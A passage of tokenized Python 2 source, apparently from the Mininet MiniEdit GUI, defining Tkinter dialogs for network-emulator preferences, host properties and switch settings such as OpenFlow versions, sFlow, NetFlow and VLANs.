OVSSwitch . __init__ ( self , name , failMode = failMode , datapath = datapath , ** params ) <EOL> self . switchIP = None <EOL> def getSwitchIP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . switchIP <EOL> def setSwitchIP ( self , ip ) : <EOL> "<STR_LIT>" <EOL> self . switchIP = ip <EOL> def start ( self , controllers ) : <EOL> "<STR_LIT>" <EOL> OVSSwitch . start ( self , controllers ) <EOL> if self . switchIP is not None : <EOL> self . cmd ( '<STR_LIT>' , self , self . switchIP ) <EOL> class PrefsDialog ( tkSimpleDialog . Dialog ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , parent , title , prefDefaults ) : <EOL> self . prefValues = prefDefaults <EOL> tkSimpleDialog . Dialog . __init__ ( self , parent , title ) <EOL> def body ( self , master ) : <EOL> "<STR_LIT>" <EOL> self . rootFrame = master <EOL> self . leftfieldFrame = Frame ( self . rootFrame , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . leftfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . rightfieldFrame = Frame ( self . rootFrame , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . rightfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . ipEntry = Entry ( self . leftfieldFrame ) <EOL> self . ipEntry . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> ipBase = self . prefValues [ '<STR_LIT>' ] <EOL> self . ipEntry . insert ( <NUM_LIT:0> , ipBase ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . terminalVar = StringVar ( self . leftfieldFrame ) <EOL> self . terminalOption = OptionMenu ( self . leftfieldFrame , self . terminalVar , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . terminalOption . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = W ) <EOL> terminalType = self . prefValues [ '<STR_LIT>' ] <EOL> self . terminalVar . set ( terminalType ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . cliStart = IntVar ( ) <EOL> self . cliButton = Checkbutton ( self . leftfieldFrame , variable = self . cliStart ) <EOL> self . cliButton . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . cliButton . deselect ( ) <EOL> else : <EOL> self . cliButton . select ( ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . switchType = StringVar ( self . leftfieldFrame ) <EOL> self . switchTypeMenu = OptionMenu ( self . leftfieldFrame , self . switchType , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . switchTypeMenu . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> , sticky = W ) <EOL> switchTypePref = self . prefValues [ '<STR_LIT>' ] <EOL> if switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT:user>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> ovsFrame = LabelFrame ( self . leftfieldFrame , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> ovsFrame . grid ( row = <NUM_LIT:4> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . ovsOf10 = IntVar ( ) <EOL> self . covsOf10 = Checkbutton ( ovsFrame , variable = self . ovsOf10 ) <EOL> self . covsOf10 . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf10 . deselect ( ) <EOL> else : <EOL> self . covsOf10 . select ( ) <EOL> self . ovsOf11 = IntVar ( ) <EOL> self . covsOf11 = Checkbutton ( ovsFrame , variable = self . ovsOf11 ) <EOL> self . covsOf11 . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf11 . deselect ( ) <EOL> else : <EOL> self . covsOf11 . select ( ) <EOL> self . ovsOf12 = IntVar ( ) <EOL> self . covsOf12 = Checkbutton ( ovsFrame , variable = self . ovsOf12 ) <EOL> self . covsOf12 . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf12 . deselect ( ) <EOL> else : <EOL> self . covsOf12 . select ( ) <EOL> self . ovsOf13 = IntVar ( ) <EOL> self . covsOf13 = Checkbutton ( ovsFrame , variable = self . ovsOf13 ) <EOL> self . covsOf13 . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf13 . deselect ( ) <EOL> else : <EOL> self . covsOf13 . select ( ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:5> , sticky = E ) <EOL> self . dpctlEntry = Entry ( self . leftfieldFrame ) <EOL> self . dpctlEntry . grid ( row = <NUM_LIT:5> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . dpctlEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> sflowValues = self . prefValues [ '<STR_LIT>' ] <EOL> self . sflowFrame = LabelFrame ( self . rightfieldFrame , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . sflowFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . sflowTarget = Entry ( self . sflowFrame ) <EOL> self . sflowTarget . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . sflowTarget . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . sflowSampling = Entry ( self . sflowFrame ) <EOL> self . sflowSampling . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> self . sflowSampling . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . sflowHeader = Entry ( self . sflowFrame ) <EOL> self . sflowHeader . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> ) <EOL> self . sflowHeader . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . sflowPolling = Entry ( self . sflowFrame ) <EOL> self . sflowPolling . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> ) <EOL> self . sflowPolling . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> nflowValues = self . prefValues [ '<STR_LIT>' ] <EOL> self . nFrame = LabelFrame ( self . rightfieldFrame , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . nFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> Label ( self . nFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . nflowTarget = Entry ( self . nFrame ) <EOL> self . nflowTarget . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . nflowTarget . insert ( <NUM_LIT:0> , nflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . nFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . nflowTimeout = Entry ( self . nFrame ) <EOL> self . nflowTimeout . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> self . nflowTimeout . insert ( <NUM_LIT:0> , nflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . nFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . nflowAddId = IntVar ( ) <EOL> self . nflowAddIdButton = Checkbutton ( self . nFrame , variable = self . nflowAddId ) <EOL> self . nflowAddIdButton . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> , sticky = W ) <EOL> if nflowValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . nflowAddIdButton . deselect ( ) <EOL> else : <EOL> self . nflowAddIdButton . select ( ) <EOL> return self . ipEntry <EOL> def apply ( self ) : <EOL> ipBase = self . ipEntry . get ( ) <EOL> terminalType = self . terminalVar . get ( ) <EOL> startCLI = str ( self . cliStart . get ( ) ) <EOL> sw = self . switchType . get ( ) <EOL> dpctl = self . dpctlEntry . get ( ) <EOL> ovsOf10 = str ( self . ovsOf10 . get ( ) ) <EOL> ovsOf11 = str ( self . ovsOf11 . get ( ) ) <EOL> ovsOf12 = str ( self . ovsOf12 . get ( ) ) <EOL> ovsOf13 = str ( self . ovsOf13 . get ( ) ) <EOL> sflowValues = { '<STR_LIT>' : self . sflowTarget . get ( ) , <EOL> '<STR_LIT>' : self . sflowSampling . get ( ) , <EOL> '<STR_LIT>' : self . sflowHeader . get ( ) , <EOL> '<STR_LIT>' : self . sflowPolling . get ( ) } <EOL> nflowvalues = { '<STR_LIT>' : self . nflowTarget . get ( ) , <EOL> '<STR_LIT>' : self . nflowTimeout . get ( ) , <EOL> '<STR_LIT>' : str ( self . nflowAddId . get ( ) ) } <EOL> self . result = { '<STR_LIT>' : ipBase , <EOL> '<STR_LIT>' : terminalType , <EOL> '<STR_LIT>' : dpctl , <EOL> '<STR_LIT>' : sflowValues , <EOL> '<STR_LIT>' : nflowvalues , <EOL> '<STR_LIT>' : startCLI } <EOL> if sw == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if StrictVersion ( MININET_VERSION ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + VERSION + '<STR_LIT:.>' ) <EOL> elif sw == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT:user>' <EOL> elif sw == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . ovsOk = True <EOL> if ovsOf11 == "<STR_LIT:1>" : <EOL> ovsVer = self . getOvsVersion ( ) <EOL> if StrictVersion ( ovsVer ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + ovsVer + '<STR_LIT:.>' ) <EOL> if ovsOf12 == "<STR_LIT:1>" or ovsOf13 == "<STR_LIT:1>" : <EOL> ovsVer = self . getOvsVersion ( ) <EOL> if StrictVersion ( ovsVer ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + ovsVer + '<STR_LIT:.>' ) <EOL> if self . ovsOk : <EOL> self . result [ '<STR_LIT>' ] = { '<STR_LIT>' : ovsOf10 , <EOL> '<STR_LIT>' : ovsOf11 , <EOL> '<STR_LIT>' : ovsOf12 , <EOL> '<STR_LIT>' : ovsOf13 } <EOL> else : <EOL> self . result = None <EOL> @ staticmethod <EOL> def getOvsVersion ( ) : <EOL> "<STR_LIT>" <EOL> outp = quietRun ( "<STR_LIT>" ) <EOL> r = r'<STR_LIT>' <EOL> m = re . search ( r , outp ) <EOL> if m is None : <EOL> print '<STR_LIT>' <EOL> return None <EOL> else : <EOL> print '<STR_LIT>' + m . group ( <NUM_LIT:1> ) <EOL> return m . group ( <NUM_LIT:1> ) <EOL> class CustomDialog ( object ) : <EOL> def __init__ ( self , master , _title ) : <EOL> self . top = Toplevel ( master ) <EOL> self . bodyFrame = Frame ( self . top ) <EOL> self . bodyFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> self . body ( self . bodyFrame ) <EOL> buttonFrame = Frame ( self . top , relief = '<STR_LIT>' , bd = <NUM_LIT:3> , bg = '<STR_LIT>' ) <EOL> buttonFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> okButton = Button ( buttonFrame , width = <NUM_LIT:8> , text = '<STR_LIT:OK>' , relief = '<STR_LIT>' , <EOL> bd = <NUM_LIT:4> , command = self . okAction ) <EOL> okButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> canlceButton = Button ( buttonFrame , width = <NUM_LIT:8> , text = '<STR_LIT>' , relief = '<STR_LIT>' , <EOL> bd = <NUM_LIT:4> , command = self . cancelAction ) <EOL> canlceButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = W ) <EOL> def body ( self , master ) : <EOL> self . rootFrame = master <EOL> def apply ( self ) : <EOL> self . top . destroy ( ) <EOL> def cancelAction ( self ) : <EOL> self . top . destroy ( ) <EOL> def okAction ( self ) : <EOL> self . apply ( ) <EOL> self . top . destroy ( ) <EOL> class HostDialog ( CustomDialog ) : <EOL> def __init__ ( self , master , title , prefDefaults ) : <EOL> self . prefValues = prefDefaults <EOL> self . result = None <EOL> CustomDialog . __init__ ( self , master , title ) <EOL> def body ( self , master ) : <EOL> self . rootFrame = master <EOL> n = Notebook ( self . rootFrame ) <EOL> self . propFrame = Frame ( n ) <EOL> self . vlanFrame = Frame ( n ) <EOL> self . interfaceFrame = Frame ( n ) <EOL> self . mountFrame = Frame ( n ) <EOL> n . add ( self . propFrame , text = '<STR_LIT>' ) <EOL> n . add ( self . vlanFrame , text = '<STR_LIT>' ) <EOL> n . add ( self . interfaceFrame , text = '<STR_LIT>' ) <EOL> n . add ( self . mountFrame , text = '<STR_LIT>' ) <EOL> n . pack ( ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . hostnameEntry = Entry ( self . propFrame ) <EOL> self . hostnameEntry . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . hostnameEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . ipEntry = Entry ( self . propFrame ) <EOL> self . ipEntry . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . ipEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . routeEntry = Entry ( self . propFrame ) <EOL> self . routeEntry . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . routeEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . cpuEntry = Entry ( self . propFrame ) <EOL> self . cpuEntry . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . cpuEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> sched = self . prefValues [ '<STR_LIT>' ] <EOL> else : <EOL> sched = '<STR_LIT:host>' <EOL> self . schedVar = StringVar ( self . propFrame ) <EOL> self . schedOption = OptionMenu ( self . propFrame , self . schedVar , "<STR_LIT:host>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . schedOption . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:2> , sticky = W ) <EOL> self . schedVar . set ( sched ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:4> , sticky = E ) <EOL> self . coreEntry = Entry ( self . propFrame ) <EOL> self . coreEntry . grid ( row = <NUM_LIT:4> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . coreEntry . insert ( <NUM_LIT:1> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:5> , sticky = E ) <EOL> self . startEntry = Entry ( self . propFrame ) <EOL> self . startEntry . grid ( row = <NUM_LIT:5> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:3> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . startEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:6> , sticky = E ) <EOL> self . stopEntry = Entry ( self . propFrame ) <EOL> self . stopEntry . grid ( row = <NUM_LIT:6> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:3> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . stopEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> self . externalInterfaces = <NUM_LIT:0> <EOL> Label ( self . interfaceFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> self . b = Button ( self . interfaceFrame , text = '<STR_LIT>' , command = self . addInterface ) <EOL> self . b . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . interfaceFrame = VerticalScrolledTable ( self . interfaceFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:1> , title = '<STR_LIT>' ) <EOL> self . interfaceFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . tableFrame = self . interfaceFrame . interior <EOL> self . tableFrame . addRow ( value = [ '<STR_LIT>' ] , readonly = True ) <EOL> externalInterfaces = [ ] <EOL> if '<STR_LIT>' in self . prefValues : <EOL> externalInterfaces = self . prefValues [ '<STR_LIT>' ] <EOL> for externalInterface in externalInterfaces : <EOL> self . tableFrame . addRow ( value = [ externalInterface ] ) <EOL> self . vlanInterfaces = <NUM_LIT:0> <EOL> Label ( self . vlanFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> self . vlanButton = Button ( self . vlanFrame , text = '<STR_LIT>' , command = self . addVlanInterface ) <EOL> self . vlanButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . vlanFrame = VerticalScrolledTable ( self . vlanFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:2> , title = '<STR_LIT>' ) <EOL> self . vlanFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . vlanTableFrame = self . vlanFrame . interior <EOL> self . vlanTableFrame . addRow ( value = [ '<STR_LIT>' , '<STR_LIT>' ] , readonly = True ) <EOL> vlanInterfaces = [ ] <EOL> if '<STR_LIT>' in self . prefValues : <EOL> vlanInterfaces = self . prefValues [ '<STR_LIT>' ] <EOL> for vlanInterface in vlanInterfaces : <EOL> self . vlanTableFrame . addRow ( value = vlanInterface ) <EOL> self . privateDirectories = <NUM_LIT:0> <EOL> Label ( self . mountFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> self . mountButton = Button ( self . mountFrame , text = '<STR_LIT>' , command = self . addDirectory ) <EOL> self . mountButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . mountFrame = VerticalScrolledTable ( self . mountFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:2> , title = '<STR_LIT>' ) <EOL> self . mountFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . mountTableFrame = self . mountFrame . interior <EOL> self . mountTableFrame . addRow ( value = [ '<STR_LIT>' , '<STR_LIT>' ] , readonly = True ) <EOL> directoryList = [ ] <EOL> if '<STR_LIT>' in self . prefValues : <EOL> directoryList = self . prefValues [ '<STR_LIT>' ] <EOL> for privateDir in directoryList : <EOL> if isinstance ( privateDir , tuple ) : <EOL> self . mountTableFrame . addRow ( value = privateDir ) <EOL> else : <EOL> self . mountTableFrame . addRow ( value = [ privateDir , '<STR_LIT>' ] ) <EOL> def addDirectory ( self ) : <EOL> self . mountTableFrame . addRow ( ) <EOL> def addVlanInterface ( self ) : <EOL> self . vlanTableFrame . addRow ( ) <EOL> def addInterface ( self ) : <EOL> self . tableFrame . addRow ( ) <EOL> def apply ( self ) : <EOL> externalInterfaces = [ ] <EOL> for row in range ( self . tableFrame . rows ) : <EOL> if ( len ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> and <EOL> row > <NUM_LIT:0> ) : <EOL> externalInterfaces . append ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) <EOL> vlanInterfaces = [ ] <EOL> for row in range ( self . vlanTableFrame . rows ) : <EOL> if ( len ( self . vlanTableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> and <EOL> len ( self . vlanTableFrame . get ( row , <NUM_LIT:1> ) ) > <NUM_LIT:0> and <EOL> row > <NUM_LIT:0> ) : <EOL> vlanInterfaces . append ( [ self . vlanTableFrame . get ( row , <NUM_LIT:0> ) , self . vlanTableFrame . get ( row , <NUM_LIT:1> ) ] ) <EOL> privateDirectories = [ ] <EOL> for row in range ( self . mountTableFrame . rows ) : <EOL> if len ( self . mountTableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> and row > <NUM_LIT:0> : <EOL> if len ( self . mountTableFrame . get ( row , <NUM_LIT:1> ) ) > <NUM_LIT:0> : <EOL> privateDirectories . append ( ( self . mountTableFrame . get ( row , <NUM_LIT:0> ) , self . mountTableFrame . get ( row , <NUM_LIT:1> ) ) ) <EOL> else : <EOL> privateDirectories . append ( self . mountTableFrame . get ( row , <NUM_LIT:0> ) ) <EOL> results = { '<STR_LIT>' : self . cpuEntry . get ( ) , <EOL> '<STR_LIT>' : self . coreEntry . get ( ) , <EOL> '<STR_LIT>' : self . schedVar . get ( ) , <EOL> '<STR_LIT>' : self . hostnameEntry . get ( ) , <EOL> '<STR_LIT>' : self . ipEntry . get ( ) , <EOL> '<STR_LIT>' : self . routeEntry . get ( ) , <EOL> '<STR_LIT>' : self . startEntry . get ( ) , <EOL> '<STR_LIT>' : self . stopEntry . get ( ) , <EOL> '<STR_LIT>' : privateDirectories , <EOL> '<STR_LIT>' : externalInterfaces , <EOL> '<STR_LIT>' : vlanInterfaces } <EOL> self . result = results <EOL> class SwitchDialog ( CustomDialog ) : <EOL> def __init__ ( self , master , title , prefDefaults ) : <EOL> self . prefValues = prefDefaults <EOL> self . result = None <EOL> CustomDialog . __init__ ( self , master , title ) <EOL> def body ( self , master ) : <EOL> self . rootFrame = master <EOL> self . leftfieldFrame = Frame ( self . rootFrame ) <EOL> self . rightfieldFrame = Frame ( self . rootFrame ) <EOL> self . leftfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> self . rightfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> rowCount = <NUM_LIT:0> <EOL> externalInterfaces = [ ] <EOL> if '<STR_LIT>' in self . prefValues : <EOL> externalInterfaces = self . prefValues [ '<STR_LIT>' ] <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . hostnameEntry = Entry ( self . leftfieldFrame ) <EOL> self . hostnameEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> self . hostnameEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . dpidEntry = Entry ( self . leftfieldFrame ) <EOL> self . dpidEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . dpidEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . nflow = IntVar ( ) <EOL> self . nflowButton = Checkbutton ( self . leftfieldFrame , variable = self . nflow ) <EOL> self . nflowButton . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> if self . prefValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . nflowButton . deselect ( ) <EOL> else : <EOL> self . nflowButton . select ( ) <EOL> else : <EOL> self . nflowButton . deselect ( ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . sflow = IntVar ( ) <EOL> self . sflowButton = Checkbutton ( self . leftfieldFrame , variable = self . sflow ) <EOL> self . sflowButton . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> if self . prefValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . sflowButton . deselect ( ) <EOL> else : <EOL> self . sflowButton . select ( ) <EOL> else : <EOL> self . sflowButton . deselect ( ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . switchType = StringVar ( self . leftfieldFrame ) <EOL> self . switchTypeMenu = OptionMenu ( self . leftfieldFrame , self . switchType , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . switchTypeMenu . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> switchTypePref = self . prefValues [ '<STR_LIT>' ] <EOL> if switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT:user>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . ipEntry = Entry ( self . leftfieldFrame ) <EOL> self . ipEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . ipEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . dpctlEntry = Entry ( self . leftfieldFrame ) <EOL> self . dpctlEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . dpctlEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . rightfieldFrame , text = "<STR_LIT>" 